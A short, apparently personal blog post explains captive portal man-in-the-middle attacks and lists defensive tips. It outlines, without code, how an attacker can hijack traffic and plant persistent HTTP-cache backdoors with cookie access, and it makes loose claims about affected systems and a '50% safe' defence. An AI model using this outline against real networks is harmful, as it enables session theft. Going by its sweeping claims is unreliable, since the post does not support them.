1 minute read

Captive portal attack!

attack

A captive portal is a web page accessed with a web browser that is displayed to newly connected users of a Wi-Fi or wired network before they are granted broader access to network resources. Captive portals are commonly used to present a landing or log-in page which may require authentication, payment, acceptance of an end-user license agreement, acceptable use policy, survey completion, or other valid credentials that both the host and user agree to adhere by. Captive portals are used for a broad range of mobile and pedestrian broadband services – including cable and commercially provided Wi-Fi and home hotspots. A captive portal can also be used to provide access to enterprise or residential wired networks, such as apartment houses, hotel rooms, and business centers.

source: wikipedia

There is more than one way to implement a captive portal, like:

  • HTTP redirect
  • ICMP redirect
  • Redirect by DNS

The attacking side works perfectly if we act MITM and running a script that receives all request from the Captive portal and connection check to reply to these request to force to open page this page will do:

  • hijacks all Internet traffic from the machine.
  • installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common Javascript CDN URLs, all with access to the user’s cookies via cache poisoning.
  • allows the attacker to remotely force the user to make HTTP requests and proxy back responses (GET & POSTs) with the user’s cookies on any backdoored domain.
  • does not require the machine to be unlocked.
  • backdoors and remote access persist even after MITM stoped.

The affected list of the operating systems with this attack:

  • Windows
  • macOS
  • iPhone
  • android
  • Linux
  • AP router itself too.

On the defense side you have to:

  • Stop using public wifi.
  • always use VPN
  • disable Captive portal

The above steps help you to stay 50% safe from this kind of attacks